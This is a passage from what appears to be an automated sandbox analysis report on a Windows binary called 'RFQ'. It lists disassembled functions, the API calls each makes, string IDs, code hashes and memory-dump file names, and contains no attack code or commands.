                                                                          • String ID:
                                                                          • API String ID: 2889604237-0
                                                                          • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                          • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                          • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                          • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                          Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __getptd_noexit.LIBCMT ref: 00415150
                                                                            • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                            • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                            • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                            • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                            • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                          • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                          • __freeptd.LIBCMT ref: 0041516B
                                                                          • ExitThread.KERNEL32 ref: 00415173
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                          • String ID:
                                                                          • API String ID: 1454798553-0
                                                                          • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                          • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                          • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                          • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                          Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _strncmp
                                                                          • String ID: Q\E
                                                                          • API String ID: 909875538-2189900498
                                                                          • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                          • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                          • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                          • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                          Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                            • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                          • String ID: AutoIt3GUI$Container
                                                                          • API String ID: 2652923123-3941886329
                                                                          • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                          • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                          • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                          • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                          Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove_strncmp
                                                                          • String ID: U$\
                                                                          • API String ID: 2666721431-100911408
                                                                          • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                          • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                          • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                          • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                          Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                          • __wcsnicmp.LIBCMT ref: 00467288
                                                                          • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                          • String ID: LPT
                                                                          • API String ID: 3035604524-1350329615
                                                                          • Opcode ID: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                                                                          • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                          • Opcode Fuzzy Hash: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                                                                          • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                          Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: \$h
                                                                          • API String ID: 4104443479-677774858
                                                                          • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                          • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                          • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                          • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                          Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memcmp
                                                                          • String ID: &
                                                                          • API String ID: 2931989736-1010288
                                                                          • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                          • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                          • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                          • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                          Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: \
                                                                          • API String ID: 4104443479-2967466578
                                                                          • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                          • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                          • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                          • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                          Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00466825
                                                                          • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CrackInternet_wcslen
                                                                          • String ID: |
                                                                          • API String ID: 596671847-2343686810
                                                                          • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                          • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                          • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                          • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                          Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: '
                                                                          • API String ID: 3850602802-1997036262
                                                                          • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                          • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                          • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                          • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                          Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _strlen.LIBCMT ref: 0040F858
                                                                            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                          • _sprintf.LIBCMT ref: 0040F9AE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$_sprintf_strlen
                                                                          • String ID: %02X
                                                                          • API String ID: 1921645428-436463671
                                                                          • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                          • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                          • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                          • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                          Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: Combobox
                                                                          • API String ID: 3850602802-2096851135
                                                                          • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                          • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                          • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                          • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                          Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: LengthMessageSendTextWindow
                                                                          • String ID: edit
                                                                          • API String ID: 2978978980-2167791130
                                                                          • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                          • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                          • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                          • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                          Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: GlobalMemorySleepStatus
                                                                          • String ID: @
                                                                          • API String ID: 2783356886-2766056989
                                                                          • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                          • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                          • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                          • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                          Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
